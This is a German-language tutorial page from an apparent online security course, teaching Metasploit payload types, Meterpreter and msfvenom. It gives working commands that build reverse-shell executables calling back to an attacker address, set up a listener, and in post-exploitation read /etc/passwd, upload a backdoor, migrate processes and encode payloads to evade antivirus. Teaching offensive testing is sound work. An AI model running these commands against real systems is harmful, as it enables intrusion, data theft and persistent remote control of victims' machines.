Payloads: Staged vs. Stageless und Meterpreter
Wählen Sie den passenden Payload für ein Szenario und verwenden Sie Meterpreter für die Post-Exploitation.
Payloads: Staged vs. Stageless und Meterpreter ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 3 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Was ist ein Payload?
Ein Payload ist der Code, der nach einem erfolgreichen Exploit auf dem Ziel ausgeführt wird. Er bestimmt, was der Angreifer erhält: eine Shell, Befehlsausführung, Dateizugriff oder einen voll ausgestatteten Agenten wie Meterpreter.
Staged- und Stageless-Payloads
Stageless-Payloads (/) enthalten alles in einer einzigen Binärdatei – sie sind größer, aber einfacher und benötigen nach der ersten Übertragung keinen Netzwerk-Callback. Staged-Payloads (//) senden zunächst einen winzigen Stager, der die zweite Stufe vom Handler herunterlädt.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsWann welcher Payload verwendet wird
Verwenden Sie stageless, wenn das Ziel nach dem ersten Exploit keinen Internetzugang oder Zugriff auf den Handler hat – der Payload muss in sich abgeschlossen sein. Verwenden Sie staged, wenn Sie einen kleineren initialen Payload wünschen und eine zuverlässige Verbindung zum Handler vorhanden ist.
Meterpreter im Überblick
Meterpreter ist der fortschrittliche Payload von Metasploit. Er läuft vollständig im Arbeitsspeicher, verwendet verschlüsselte Kommunikation und stellt eine umfangreiche API bereit: Dateisystemzugriff, Prozessmigration, Keylogging, Screenshot-Erstellung und Pivoting.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runMeterpreter-Befehle
Wichtige Meterpreter-Befehle für die Post-Exploitation umfassen Systeminformationen, Prozesslisten, Dateioperationen und Netzwerkfunktionen.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellProzessmigration
Migrieren Sie den Meterpreter-Prozess in einen stabileren oder weniger verdächtigen Prozess (z. B. explorer.exe unter Windows). Dadurch können auch Berechtigungen erweitert werden, wenn die Migration in einen Prozess mit höheren Rechten erfolgt.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsPayloads mit msfvenom erzeugen
msfvenom erzeugt eigenständige Payload-Dateien (EXE, ELF, APK, Shellcode) zur Übertragung per Phishing, USB-Datenträger oder Web-Shell in autorisierten Tests.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/Handler zum Empfangen von Shells
Das Auxiliary-Modul multi/handler empfängt Reverse-Shell-Verbindungen. Konfigurieren Sie es vor der Übertragung des Payloads mit demselben Payload, LHOST und LPORT, die Sie in msfvenom verwendet haben.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobGrundlagen von Kodierung und Umgehung
msfvenom-Encoder können Payloads verschleiern, um eine grundlegende signaturbasierte AV-Erkennung zu umgehen. Hinweis: Moderne EDR-Systeme verwenden Verhaltenserkennung – Encoder allein reichen gegen fortschrittliche Schutzmechanismen nicht aus.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exeBind- und Reverse-Payloads
Reverse-Payloads verbinden sich vom Ziel zum Angreifer (besser geeignet für NAT und Firewalls). Bind-Payloads lauschen auf dem Ziel – der Angreifer verbindet sich mit ihnen. Reverse wird in den meisten Szenarien bevorzugt.
Payload-Erkennung durch Verteidiger
Verteidiger erkennen Meterpreter anhand von Netzwerk-Signaturen (C2-Datenverkehrsmuster), durch Speicher-Scanning (Artefakte der reflektiven DLL-Injektion) und mittels Verhaltensanalyse (Process Hollowing, ungewöhnliche Eltern-Kind-Beziehungen).
Kurzer Test
Wodurch unterscheidet sich ein Staged-Payload in Metasploit von einem Stageless-Payload?
Zusammenfassung: Payloads und Meterpreter
Wählen Sie Staged-Payloads für eine geringe anfängliche Größe und Stageless-Payloads für eine in sich abgeschlossene Übertragung. Meterpreter ist der leistungsfähigste Payload für die Post-Exploitation: Er läuft im Arbeitsspeicher, kommuniziert verschlüsselt und ist erweiterbar. Verwenden Sie msfvenom zum Erzeugen eigenständiger Binärdateien und konfigurieren Sie immer multi/handler, um Callbacks zu empfangen.
Häufig gestellte Fragen
Ist die Lektion „Payloads: Staged vs. Stageless und Meterpreter“ kostenlos?
Ja — der vollständige Text von „Payloads: Staged vs. Stageless und Meterpreter“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „Payloads: Staged vs. Stageless und Meterpreter“?
Wählen Sie den passenden Payload für ein Szenario und verwenden Sie Meterpreter für die Post-Exploitation. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Cyber Security Academy zu starten?
Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 3 von 4.
Wie lange dauert die Lektion „Payloads: Staged vs. Stageless und Meterpreter“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?
Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- Metasploit-Architektur und msfconsole
- Eine bekannte Schwachstelle ausnutzen
- Payloads: Staged vs. Stageless und Meterpreter
- Post-Exploitation: Pivoting und Persistenz